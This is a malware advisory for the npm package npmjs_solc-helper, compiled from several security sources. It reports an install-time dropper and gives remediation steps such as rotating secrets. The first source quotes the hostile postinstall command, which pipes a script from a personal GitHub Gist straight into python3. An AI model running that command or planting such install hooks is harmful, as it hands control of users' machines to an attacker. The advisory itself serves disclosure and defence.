MAL-2026-3723
Malicious code in npmjs_solc-helper (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71)
The package.json defines a postinstall lifecycle hook that invokes child_process.exec to run `curl -s https://gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3`, with a wget fallback to the same Gist. On `npm install`, the package downloads an attacker-controlled Python script from an anonymous personal GitHub Gist and pipes it directly to python3 with no version pinning, hash verification, or integrity check. The Gist is hosted by an individual account (`guellemilb`) unrelated to any established publisher, is mutable (the author can swap the payload at any time), and the fetched content is executed outside the Node ecosystem to evade Node-based scanners. The package's name suggests a Solidity compiler helper, which has no legitimate need to pull and run arbitrary Python from a personal Gist at install time. This is a canonical install-time remote-code-execution dropper.
## Source: ghsa-malware (4b7abc65278cd38e0651950e35992c13c8fb878026ecc2375b185027e5f9cbc0)
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
## Source: ossf-package-analysis (403dac6f4c0356afdc379cd24298b168012c1724a7c165a256b0ea53c06b7560)
The OpenSSF Package Analysis project identified 'npmjs_solc-helper' @ 2.0.0 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
Affected packages
No fixed version published yet for npmjs_solc-helper (npm). Pin to a known-safe version or switch to an alternative.